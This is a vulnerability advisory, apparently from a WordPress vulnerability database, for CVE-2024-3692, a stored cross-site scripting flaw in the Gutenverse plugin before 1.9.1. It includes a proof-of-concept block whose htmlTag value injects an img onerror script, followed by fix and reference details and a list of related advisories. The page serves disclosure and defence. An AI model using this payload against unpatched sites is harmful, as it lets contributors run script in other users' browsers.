Gutenverse < 1.9.1 – Contributor+ Stored XSS | CVE 2024-3692 | Plugin Vulnerabilities

Description

The plugin does not validate the htmlTag option in various of its block before outputting it back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks

Proof of Concept

As a contributor, put the below code in a post when in Code Editor Mode:

<!-- wp:gutenverse/post-title {"elementId":"guten-sw5SZ2","htmlTag":"img src=x onerror=alert(/XSS-htmlTag/)"} -->
<div class="guten-element guten-post-title guten-sw5SZ2"></div>
<!-- /wp:gutenverse/post-title -->

The XS will be triggered when any user will (pre)view the post

Affects Plugins

Fixed in 1.9.1

References

CVE

URL

https://research.cleantalk.org/cve-2024-3692/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Original Researcher

Dmtirii Ignatyev

Submitter

Dmtirii Ignatyev

Submitter website

https://research.cleantalk.org

Verified

Yes

WPVDB ID

6f100f85-3a76-44be-8092-06eb8595b0c9

Timeline

Publicly Published

2024-04-12 (about 1 months ago)

Added

2024-04-12 (about 1 months ago)

Last Updated

2024-04-12 (about 1 months ago)

Other

Published

Title

Published

2024-03-25

Title

Simply Static < 3.1.4 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2023-10-25

Title

Simple User Listing < 1.9.3 - Reflected XSS

Published

2023-05-15

Title

Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue < 3.1.61 - Reflected XSS

Published

2022-02-28

Title

AP Mega Menu < 3.0.8 - Reflected Cross-Site Scripting

Published

2016-02-22

Title

All In One WP Security And Firewall < 4.0.5 - XSS